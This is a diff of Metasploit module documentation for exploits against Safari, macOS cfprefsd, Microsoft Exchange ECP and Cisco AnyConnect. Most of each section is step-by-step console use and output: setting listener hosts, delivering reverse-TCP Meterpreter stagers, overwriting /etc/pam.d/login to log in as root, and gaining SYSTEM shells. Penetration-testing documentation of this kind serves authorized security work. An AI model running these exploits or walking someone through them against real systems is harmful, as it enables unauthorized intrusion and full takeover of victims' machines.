+1. `set LHOST <tab>`
+1. `set SRVHOST <tab>`
+1. `exploit`
+1. Visit the URL on a vulnerable version of Safari
+
+## Scenarios
+
+### macOS Catalina 10.15.4
+
+```
+msf6 > use exploit/osx/browser/safari_in_operator_side_effect
+[*] Using configured payload osx/x64/meterpreter/reverse_tcp
+msf6 exploit(osx/browser/safari_in_operator_side_effect) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf6 exploit(osx/browser/safari_in_operator_side_effect) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+msf6 exploit(osx/browser/safari_in_operator_side_effect) > set URIPATH /
+URIPATH => /
+msf6 exploit(osx/browser/safari_in_operator_side_effect) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(osx/browser/safari_in_operator_side_effect) >
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Using URL: http://192.168.56.1:8080/
+[*] Server started.
+[*] 192.168.56.4     safari_in_operator_side_effect - Request / from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
+[+] 192.168.56.4     safari_in_operator_side_effect - Safari version 13.1 appears to be vulnerable
+[*] 192.168.56.4     safari_in_operator_side_effect - Request /LmcM.pdf from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
+[*] Transmitting first stager...(210 bytes)
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (799916 bytes) to 192.168.56.4
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.4:49409) at 2020-09-04 15:05:52 +0800
+```
+
+### Adding offsets for new versions
+
+Although all macOS versions below 10.15.4 are vulnerable, some versions are not
+supported. It may be possible to add support for a vulnerable version by adding
+new offsets. The following commands can be used to gather some of these offsets:
+
+```
+brew install radare2
+r2 /System/Library/Frameworks/JavaScriptCore.framework/Versions/Current/JavaScriptCore -2qQ -c 'af; s sym.imp.confstr; s'
+r2 /usr/lib/system/libsystem_c.dylib -2qQ -c 'af; s sym._confstr; s'
+r2 /usr/lib/system/libsystem_c.dylib -2qQ -c 'af; s sym.imp.dlsym; s'
+r2 /usr/lib/system/libsystem_c.dylib -2qQ -c 'af; s sym.imp.dlopen; s'
+```
+
+You can then add the offsets to the module:
+`modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb`
+
+You may also need to adjust the offsets here:
+
+`external/source/exploits/CVE-2020-9850/payload/sbx/safari.mm:53`
+
+Please don't forget to contribute the offsets back to the framework if you have
+successfully tested them.
+
@@ -0,0 +1,70 @@
+## Vulnerable Application
+
+This module exploits an arbitrary file write in cfprefsd on macOS <= 10.15.4 in
+order to run a payload as root. The CFPreferencesSetAppValue function, which is
+reachable from most unsandboxed processes, can be exploited with a race condition
+in order to overwrite an arbitrary file as root. By overwriting /etc/pam.d/login
+a user can then login as root with the `login root` command without a password.
+
+
+## Verification Steps
+
+1. Get a session on a vulnerable system
+2. `use exploit/osx/local/cfprefsd_race_condition`
+3. `set lhost <IP>`
+4. `set lport <PORT>`
+5. `set session <session_id>`
+6. `run`
+
+## Scenarios
+
+### macOS Catalina 10.15.4
+
+```
+msf6 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                 Information                                                                       Connection
+  --  ----  ----                 -----------                                                                       ----------
+  1         meterpreter x64/osx  user @ Users-Macbook-Pro.local (uid=501, gid=20, euid=501, egid=20) @ Users-M...  192.168.56.1:4444 -> 192.168.56.4:49451 (192.168.56.4)
+
+msf6 exploit(multi/handler) > use exploit/osx/local/cfprefsd_race_condition
+[*] Using configured payload osx/x64/meterpreter/reverse_tcp
+msf6 exploit(osx/local/cfprefsd_race_condition) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf6 exploit(osx/local/cfprefsd_race_condition) > set LPORT 5555
+LPORT => 5555
+msf6 exploit(osx/local/cfprefsd_race_condition) > set SESSION 1
+SESSION => 1
+msf6 exploit(osx/local/cfprefsd_race_condition) > exploit
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 192.168.56.1:5555
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Writing '/tmp/.Ug0wUz4HX6' (17204 bytes) ...
+[*] Writing '/tmp/.qZy9vVNU' (14748 bytes) ...
+[*] Executing exploit '/tmp/.qZy9vVNU /etc/pam.d/login'
+[*] Exploit result:
+Trying 10000 calls...
+access: Permission denied
+pwned! /etc/pam.d/login is now writable!
+[*] Running cmd:
+echo '/tmp/.Ug0wUz4HX6 & disown' | login root
+[*] Transmitting first stager...(210 bytes)
+[*] Command output:
+Last login: Tue Aug 18 09:56:20 on tty??
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (799916 bytes) to 192.168.56.4
+[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.4:49452) at 2020-09-04 17:36:45 +0800
+
+meterpreter >
+[+] /etc/pam.d/login was restored
+
+meterpreter > getuid
+Server username: root @ Users-Macbook-Pro.local (uid=0, gid=0, euid=0, egid=0)
+
+```
+
@@ -0,0 +1,123 @@
+## Vulnerable Application
+
+### Description
+
+This vulnerability allows remote attackers to execute arbitrary code
+on affected installations of Exchange Server. Authentication is
+required to exploit this vulnerability. Additionally, the target user
+must have the `Data Loss Prevention` role assigned and an active
+mailbox.
+
+If the user is in the `Compliance Management` or greater `Organization
+Management` role groups, then they have the `Data Loss Prevention`
+role. Since the user who installed Exchange is in the `Organization
+Management` role group, they transitively have the `Data Loss
+Prevention` role.
+
+The specific flaw exists within the processing of the `New-DlpPolicy`
+cmdlet. The issue results from the lack of proper validation of
+user-supplied template data when creating a DLP policy. An attacker
+can leverage this vulnerability to execute code in the context of
+`SYSTEM`.
+
+Tested against Exchange Server 2016 CU14 on Windows Server 2016.
+
+### Setup
+
+Set up a [vulnerable target](#targets).
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+`Exchange Server 2016 and 2019 w/o KB4577352`
+
+## Options
+
+### USERNAME
+
+Set this to the OWA username.
+
+### PASSWORD
+
+Set this to the OWA password.
+
+## Scenarios
+
+### Exchange Server 2016 CU14 on Windows Server 2016
+
+```
+msf6 > use exploit/windows/http/exchange_ecp_dlp_policy
+[*] Using configured payload windows/x64/meterpreter/reverse_https
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > options
+
+Module options (exploit/windows/http/exchange_ecp_dlp_policy):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD                    no        OWA password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   USERNAME                    no        OWA username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_https):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST                      yes       The local listener hostname
+   LPORT     8443             yes       The local listener port
+   LURI                       no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Exchange Server 2016 and 2019 w/o KB4577352
+
+
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set rhosts 192.168.123.192
+rhosts => 192.168.123.192
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set username Administrator
+username => Administrator
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set password Passw0rd!
+password => Passw0rd!
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run
+
+[*] Started HTTPS reverse handler on https://192.168.123.1:8443
+[*] Executing automatic check (disable AutoCheck to override)
+[!] The service is running, but could not be validated. OWA is running at https://192.168.123.192/owa/
+[*] Logging in to OWA with creds Administrator:Passw0rd!
+[+] Successfully logged in to OWA
+[*] Retrieving ViewState from DLP policy creation page
+[+] Successfully retrieved ViewState
+[*] Creating custom DLP policy from malicious template
+[*] DLP policy name: Abbotstone Agricultural Property Unit Trust Data
+[*] Powershell command length: 2372
+[*] https://192.168.123.1:8443 handling request from 192.168.123.192; (UUID: rwlz4ahe) Staging x64 payload (201308 bytes) ...
+[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.192:6951) at 2020-09-16 02:39:17 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-365Q2VJJS17
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : GIBSON
+Logged On Users : 8
+Meterpreter     : x64/windows
+meterpreter >
+```
@@ -31,6 +31,10 @@ encoded which increases the size as well. The .NET deserialization used is the

 ## Options

+### DOMAIN
+
+The authentication realm for the corresponding `USERNAME` argument
+
 ### USERNAME

 Username to log in with
@@ -43,66 +47,68 @@ Password to log in with

 ### Exchange 2016 on Server 2012 x64

-  For example:
+For example:

-    msf5 > use exploit/windows/http/exchange_ecp_viewstate
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129
-    RHOSTS => 192.168.159.129
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe
-    USERNAME => msflab.local\jdoe
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1
-    PASSWORD => Password1
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1
-    TARGET => 1
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
-    PAYLOAD => windows/x64/meterpreter/reverse_tcp
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128
-    LHOST => 192.168.159.128
-    msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit
-    
-    [*] Started reverse TCP handler on 192.168.159.128:4444 
-    [*] Command Stager progress -   3.61% done (449/12424 bytes)
-    [*] Command Stager progress -   7.23% done (898/12424 bytes)
-    [*] Command Stager progress -  10.84% done (1347/12424 bytes)
-    [*] Command Stager progress -  14.46% done (1796/12424 bytes)
-    [*] Command Stager progress -  18.07% done (2245/12424 bytes)
-    [*] Command Stager progress -  21.68% done (2694/12424 bytes)
-    [*] Command Stager progress -  25.30% done (3143/12424 bytes)
-    [*] Command Stager progress -  28.91% done (3592/12424 bytes)
-    [*] Command Stager progress -  32.53% done (4041/12424 bytes)
-    [*] Command Stager progress -  36.14% done (4490/12424 bytes)
-    [*] Command Stager progress -  39.75% done (4939/12424 bytes)
-    [*] Command Stager progress -  43.37% done (5388/12424 bytes)
-    [*] Command Stager progress -  46.98% done (5837/12424 bytes)
-    [*] Command Stager progress -  50.60% done (6286/12424 bytes)
-    [*] Command Stager progress -  54.21% done (6735/12424 bytes)
-    [*] Command Stager progress -  57.82% done (7184/12424 bytes)
-    [*] Command Stager progress -  61.44% done (7633/12424 bytes)
-    [*] Command Stager progress -  65.05% done (8082/12424 bytes)
-    [*] Command Stager progress -  68.67% done (8531/12424 bytes)
-    [*] Command Stager progress -  72.28% done (8980/12424 bytes)
-    [*] Command Stager progress -  75.89% done (9429/12424 bytes)
-    [*] Command Stager progress -  79.51% done (9878/12424 bytes)
-    [*] Command Stager progress -  82.74% done (10279/12424 bytes)
-    [*] Command Stager progress -  86.15% done (10703/12424 bytes)
-    [*] Command Stager progress -  89.43% done (11111/12424 bytes)
-    [*] Command Stager progress -  92.91% done (11543/12424 bytes)
-    [*] Command Stager progress -  96.28% done (11962/12424 bytes)
-    [*] Sending stage (206403 bytes) to 192.168.159.129
-    [*] Command Stager progress -  99.84% done (12404/12424 bytes)
-    [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:17626) at 2020-03-02 10:40:52 -0500
-    [*] Command Stager progress - 100.00% done (12424/12424 bytes)
-    
-    meterpreter > getuid
-    Server username: NT AUTHORITY\SYSTEM
-    meterpreter > sysinfo
-    Computer        : EXCHANGE
-    OS              : Windows 2012 R2 (6.3 Build 9600).
-    Architecture    : x64
-    System Language : en_US
-    Domain          : MSFLAB
-    Logged On Users : 9
-    Meterpreter     : x64/windows
-    meterpreter > 
+```
+msf5 > use exploit/windows/http/exchange_ecp_viewstate
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129
+RHOSTS => 192.168.159.129
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe
+USERNAME => msflab.local\jdoe
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1
+PASSWORD => Password1
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1
+TARGET => 1
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Command Stager progress -   3.61% done (449/12424 bytes)
+[*] Command Stager progress -   7.23% done (898/12424 bytes)
+[*] Command Stager progress -  10.84% done (1347/12424 bytes)
+[*] Command Stager progress -  14.46% done (1796/12424 bytes)
+[*] Command Stager progress -  18.07% done (2245/12424 bytes)
+[*] Command Stager progress -  21.68% done (2694/12424 bytes)
+[*] Command Stager progress -  25.30% done (3143/12424 bytes)
+[*] Command Stager progress -  28.91% done (3592/12424 bytes)
+[*] Command Stager progress -  32.53% done (4041/12424 bytes)
+[*] Command Stager progress -  36.14% done (4490/12424 bytes)
+[*] Command Stager progress -  39.75% done (4939/12424 bytes)
+[*] Command Stager progress -  43.37% done (5388/12424 bytes)
+[*] Command Stager progress -  46.98% done (5837/12424 bytes)
+[*] Command Stager progress -  50.60% done (6286/12424 bytes)
+[*] Command Stager progress -  54.21% done (6735/12424 bytes)
+[*] Command Stager progress -  57.82% done (7184/12424 bytes)
+[*] Command Stager progress -  61.44% done (7633/12424 bytes)
+[*] Command Stager progress -  65.05% done (8082/12424 bytes)
+[*] Command Stager progress -  68.67% done (8531/12424 bytes)
+[*] Command Stager progress -  72.28% done (8980/12424 bytes)
+[*] Command Stager progress -  75.89% done (9429/12424 bytes)
+[*] Command Stager progress -  79.51% done (9878/12424 bytes)
+[*] Command Stager progress -  82.74% done (10279/12424 bytes)
+[*] Command Stager progress -  86.15% done (10703/12424 bytes)
+[*] Command Stager progress -  89.43% done (11111/12424 bytes)
+[*] Command Stager progress -  92.91% done (11543/12424 bytes)
+[*] Command Stager progress -  96.28% done (11962/12424 bytes)
+[*] Sending stage (206403 bytes) to 192.168.159.129
+[*] Command Stager progress -  99.84% done (12404/12424 bytes)
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:17626) at 2020-03-02 10:40:52 -0500
+[*] Command Stager progress - 100.00% done (12424/12424 bytes)
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : EXCHANGE
+OS              : Windows 2012 R2 (6.3 Build 9600).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter > 
+```

 [1]: https://github.com/pwntester/ysoserial.net
@@ -0,0 +1,224 @@
+## Vulnerable Application
+
+The installer component of Cisco AnyConnect Secure Mobility Client for Windows
+prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
+to create/overwrite files in arbitrary locations with system level privileges.
+
+The installer component of Cisco AnyConnect Secure Mobility Client for Windows
+prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
+to execute code on the affected machine with with system level privileges.
+
+Both attacks consist in sending a specially crafted IPC request to the TCP
+port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
+Secure Mobility Agent service. This service will then launch the vulnerable
+installer component (`vpndownloader`), which copies itself to an arbitrary
+location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
+executed with system privileges. Since `vpndownloader` is also vulnerable to DLL
+hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same
+location `vpndownloader` will be copied to get code execution with system
+privileges.
+
+The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
+Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
+version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
+successfully tested against Cisco AnyConnect Secure Mobility Client versions
+4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
+1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).
+
+AnyConnect Secure Mobility Client is not publicly available and only customers
+with active contracts can download it. For this reason, download links have not
+been provided.
+
+## Install the Application
+
+  1. Unzip the AnyConnect package
+  2. Open the extracted folder
+  3. Run `Setup.exe`
+  4. Select `Core & VPN` only (no need to install the full package)
+  5. Click `Install Selected`
+  6. Confirm you want to install this specific version of Anyconnect (click `OK`)
+  7. Accept the EULA (click `Accept`)
+  8. `Installation complete` (click `OK`)... enjoy
+
+  Or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and
+  follow the installation steps with the default options.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a session with non-administrative privileges
+  3. Do: ```use exploit/windows/local/anyconnect_lpe```
+  4. Do: ```set SESSION <SESSION>```
+  5. Do: ```set payload windows/meterpreter/reverse_tcp```
+  6. Do: ```set LHOST <LHOST>```
+  7. Do: ```set LPORT <LPORT>```
+  8. Do: ```check```
+  9. Do: ```run```
+  10. You should get a new session as the SYSTEM user
+
+## Options
+### INSTALL_PATH
+  Set Cisco AnyConnect Secure Mobility Client installation path (where
+  `vpndownloader.exe`should be found). It will be automatically detectedif not set.
+
+### CVE
+  Set the CVE to use (CVE-2020-3153 or CVE-2020-3433). Default: CVE-2020-3433.
+
+### ForceExploit
+
+  Set this to `true` to override the `check` result during exploitation.
+
+## Scenarios
+
+### Windows 10 version 1909 (x64) with AnyConnect 4.8.3052 - CVE-2020-3433
+
+```
+msf5 exploit(windows/local/anyconnect_lpe) > set SESSION 1
+SESSION => 1
+msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
+lhost => 192.168.1.24
+msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
+lport => 4445
+msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
+verbose => true
+msf5 exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3433
+CVE => CVE-2020-3433
+msf5 exploit(windows/local/anyconnect_lpe) > check 
+
+[*] Try to detect installation path...
+[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
+[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
+msf5 exploit(windows/local/anyconnect_lpe) > run
+
+[*] Started reverse TCP handler on 192.168.1.24:4445 
+[*] Try to detect installation path...
+[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
+[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
+[*] "-ipc" argument needed
+[*] Creating directory C:\Users\ATGO\AppData\Local\Temp\16Nkpr
+[*] Meterpreter Session
+[*] C:\Users\ATGO\AppData\Local\Temp\16Nkpr created
+[*] Writing the payload to C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll
+[*] IPC Command: "CAC-nc-install        -ipc=76731      C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe     C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll"
+[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
+[*] Send the encoded IPC command (size = 288 bytes)
+[*] Sending stage (176195 bytes) to 192.168.1.20
+[*] Meterpreter session 3 opened (192.168.1.24:4445 -> 192.168.1.20:44712) at 2020-09-01 14:12:05 +0200
+[+] Deleted C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll
+[+] Deleted C:\Users\ATGO\AppData\Local\Temp\16Nkpr
+[*] Shutdown the socket
+
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo 
+Computer        : W
+OS              : Windows 10 (10.0 Build 18363).
+Architecture    : x64
+System Language : fr_FR
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+```
+### Windows 7 SP1  with AnyConnect 4.7.4056 - CVE-2020-3153
+
+```
+msf5 exploit(windows/local/anyconnect_lpe) > set session 4
+session => 4
+msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
+lhost => 192.168.1.24
+msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
+lport => 4445
+msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
+verbose => true
+msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3153
+cve => CVE-2020-3153
+msf5 exploit(windows/local/anyconnect_lpe) > check 
+
+[*] Try to detect installation path...
+[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
+[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
+msf5 exploit(windows/local/anyconnect_lpe) > run
+
+[*] Started reverse TCP handler on 192.168.1.24:4445 
+[*] Try to detect installation path...
+[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
+[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
+[*] "-ipc" argument needed
+[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
+[*] IPC Command: "CAC-nc-install        -ipc=29278      C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\iZnG\iZnG\iZnG\iZnG\../../../../vpndownloader.exe     -"
+[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
+[*] Send the encoded IPC command (size = 270 bytes)
+[*] Sending stage (176195 bytes) to 192.168.1.20
+[*] Meterpreter session 5 opened (192.168.1.24:4445 -> 192.168.1.20:45098) at 2020-09-01 14:23:13 +0200
+[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
+[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
+[*] Shutdown the socket
+
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo 
+Computer        : ATGO-PC
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+```
+
+### Windows 7 SP1  with AnyConnect 4.7.4056 - CVE-2020-3433
+
+```
+msf5 exploit(windows/local/anyconnect_lpe) > set session 4
+session => 4
+msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
+lhost => 192.168.1.24
+msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
+lport => 4445
+msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
+verbose => true
+msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3433
+cve => CVE-2020-3433
+msf5 exploit(windows/local/anyconnect_lpe) > check 
+
+[*] Try to detect installation path...
+[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
+[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
+msf5 exploit(windows/local/anyconnect_lpe) > run
+
+[*] Started reverse TCP handler on 192.168.1.24:4445 
+[*] Try to detect installation path...
+[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
+[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
+[*] "-ipc" argument needed
+[*] Creating directory C:\Users\atgo\AppData\Local\Temp\fPTN4o
+[*] Meterpreter Session
+[*] C:\Users\atgo\AppData\Local\Temp\fPTN4o created
+[*] Writing the payload to C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll
+[*] IPC Command: "CAC-nc-install        -ipc=88243      C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe     C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll"
+[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
+[*] Send the encoded IPC command (size = 288 bytes)
+[*] Sending stage (176195 bytes) to 192.168.1.20
+[*] Meterpreter session 6 opened (192.168.1.24:4445 -> 192.168.1.20:45102) at 2020-09-01 14:24:48 +0200
+[+] Deleted C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll
+[+] Deleted C:\Users\atgo\AppData\Local\Temp\fPTN4o
+[*] Shutdown the socket
+
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo 
+Computer        : ATGO-PC
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```
@@ -1,148 +0,0 @@
-## Vulnerable Application
-
-The installer component of Cisco AnyConnect Secure Mobility Client for Windows
-prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
-to create/overwrite files in arbitrary locations as the SYSTEM user.
-
-The attack consists of sending a specially crafted IPC request to the TCP port
-62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
-Mobility Agent service. This service will then launch the vulnerable installer
-component (`vpndownloader`), which copies itself to an arbitrary location
-before being executed as the SYSTEM user. Since `vpndownloader` is also
-vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
-at the same location `vpndownloader` is copied to get code execution as the
-SYSTEM user.
-
-This exploit has been successfully tested against Cisco AnyConnect Secure
-Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
-version 1909 (x64) and Windows 7 SP1 (x86).
-
-AnyConnect Secure Mobility Client is not publicly available and only customers
-with active contracts can download it. For this reason, download links have not
-been provided.
-
-## Install the Application
-
-  1. Unzip the AnyConnect package
-  2. Open the extracted folder
-  3. Run `Setup.exe`
-  4. Select `Core & VPN` only (no need to install the full package)
-  5. Click `Install Selected`
-  6. Confirm you want to install this specific version of Anyconnect (click `OK`)
-  7. Accept the EULA (click `Accept`)
-  8. `Installation complete` (click `OK`)... enjoy
-
-  Or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and
-  follow the installation steps with the default options.
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Get a session with non-administrative privileges
-  3. Do: ```use exploit/windows/local/anyconnect_path_traversal_lpe```
-  4. Do: ```set SESSION <SESSION>```
-  5. Do: ```set payload windows/meterpreter/reverse_tcp```
-  6. Do: ```set LHOST <LHOST>```
-  7. Do: ```set LPORT <LPORT>```
-  8. Do: ```check```
-  9. Do: ```run```
-  10. You should get a new session as the SYSTEM user
-
-## Options
-### ForceExploit
-
-  Set this to `true` to override the `check` result during exploitation.
-
-## Scenarios
-
-### Windows 10 version 1909 (x64) with AnyConnect 4.7.4056
-
-  ```
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
-  SESSION => 8
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
-  payload => windows/meterpreter/reverse_tcp
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
-  LHOST => 172.16.60.1
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
-  LPORT => 4445
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
-  verbose => true
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check
-
-  [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
-  [+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
-  [*] The target appears to be vulnerable.
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run
-
-  [*] Started reverse TCP handler on 172.16.60.1:4445
-  [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
-  [+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
-  [*] "-ipc" argument needed
-  [*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
